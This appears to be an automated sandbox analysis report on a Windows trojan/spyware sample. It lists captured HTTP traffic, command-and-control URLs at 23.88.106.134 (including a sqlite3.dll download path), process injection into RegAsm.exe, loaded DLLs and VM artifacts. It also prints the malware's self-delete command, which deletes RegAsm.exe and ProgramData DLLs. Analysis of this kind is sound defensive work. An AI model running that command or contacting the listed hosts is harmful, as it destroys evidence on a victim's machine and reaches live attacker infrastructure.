64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: RegAsm.exe, 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.88.106.134 |
Source: RegAsm.exe, 00000001.00000002.2034339347.0000000000439000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034961312.00000000010C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.88.106.134/84bad7132df89fd7/sqlite3.dll |
Source: RegAsm.exe, 00000001.00000002.2034339347.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034339347.000000000054D000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://23.88.106.134/c73eed764cc59dcb.php |
Source: RegAsm.exe, 00000001.00000002.2034339347.0000000000550000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034339347.000000000054D000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://23.88.106.134/c73eed764cc59dcb.php.0//EN |
Source: RegAsm.exe, 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://23.88.106.134/c73eed764cc59dcb.phpininit.exe |
Source: RegAsm.exe, 00000001.00000002.2034961312.00000000010C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.88.106.134/c73eed764cc59dcb.phpxKr |
Source: Amcache.hve.8.dr | String found in binary or memory: http://upx.sf.net |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F41F4 | 0_2_004F41F4 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004E0250 | 0_2_004E0250 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F2316 | 0_2_004F2316 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00512549 | 0_2_00512549 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F265E | 0_2_004F265E |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F4615 | 0_2_004F4615 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004CA690 | 0_2_004CA690 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004E0690 | 0_2_004E0690 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00516790 | 0_2_00516790 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004FC846 | 0_2_004FC846 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F29B5 | 0_2_004F29B5 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F4A45 | 0_2_004F4A45 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F2CFD | 0_2_004F2CFD |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F308B | 0_2_004F308B |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004DD17E | 0_2_004DD17E |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004AD1A0 | 0_2_004AD1A0 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_0050B28F | 0_2_0050B28F |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F3428 | 0_2_004F3428 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F37B6 | 0_2_004F37B6 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004CFA54 | 0_2_004CFA54 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_00517ABC | 0_2_00517ABC |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F3B1B | 0_2_004F3B1B |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004DDC51 | 0_2_004DDC51 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004DFCD0 | 0_2_004DFCD0 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_0050BC81 | 0_2_0050BC81 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004F3E8F | 0_2_004F3E8F |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: String function: 004D8C87 appears 42 times | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: String function: 00505231 appears 54 times | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: String function: 004C7E91 appears 126 times | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: String function: 004C7EC4 appears 82 times | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: String function: 004C8F20 appears 78 times | |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004043B0 appears 316 times | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 268 |
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/5@0/1 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_00414DD0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, | 1_2_00414DD0 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_03 |
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4288 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Command line argument: SVWj@h | 0_2_005222C6 |
Source: w7kdnBzGat.exe | ReversingLabs: Detection: 63% |
Source: w7kdnBzGat.exe | Virustotal: Detection: 50% |
Source: RegAsm.exe | String found in binary or memory: <address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address> </body></html> ------JJKFBAKFBGDHIEBGDAKF |
Source: RegAsm.exe | String found in binary or memory: <address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address> </body></html> |
Source: RegAsm.exe | String found in binary or memory: <address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address> </body></html> ------ |
Source: RegAsm.exe | String found in binary or memory: <address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address> </body></html> ------JJKFBAKFBGDHIEBGDAKF |
Source: unknown | Process created: C:\Users\user\Desktop\w7kdnBzGat.exe "C:\Users\user\Desktop\w7kdnBzGat.exe" | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 268 | |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Section loaded: apphelp.dll |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Section loaded: kernel.appcore.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wininet.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iertutil.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: urlmon.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: srvcli.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: netutils.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: propsys.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: edputil.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.staterepositoryps.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wintypes.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: appresolver.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: bcp47langs.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: slc.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sppc.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: onecorecommonproxystub.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: onecoreuapcommonproxystub.dll |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: pcacli.dll |
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll |
Source: w7kdnBzGat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: | Binary string: C:\p2facz8e\output.pdb& source: w7kdnBzGat.exe |
Source: | Binary string: C:\p2facz8e\output.pdb source: w7kdnBzGat.exe |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_0041917C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, | 1_2_0041917C |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004C8F70 push ecx; ret | 0_2_004C8F83 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_004C7E5F push ecx; ret | 0_2_004C7E72 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_004176B5 push ecx; ret | 1_2_004176C8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_0050E877 FindFirstFileExW, | 0_2_0050E877 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_0050EC61 FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 0_2_0050EC61 |
Source: Amcache.hve.8.dr | Binary or memory string: VMware |
Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual USB Mouse |
Source: Amcache.hve.8.dr | Binary or memory string: vmci.syshbin |
Source: Amcache.hve.8.dr | Binary or memory string: VMware, Inc. |
Source: Amcache.hve.8.dr | Binary or memory string: VMware20,1hbin@ |
Source: Amcache.hve.8.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563 |
Source: Amcache.hve.8.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.8.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys |
Source: RegAsm.exe, 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2034961312.00000000010C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: Amcache.hve.8.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.8.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev |
Source: Amcache.hve.8.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys |
Source: Amcache.hve.8.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.8.dr | Binary or memory string: vmci.sys |
Source: Amcache.hve.8.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0 |
Source: Amcache.hve.8.dr | Binary or memory string: vmci.syshbin` |
Source: Amcache.hve.8.dr | Binary or memory string: \driver\vmci,\driver\pci |
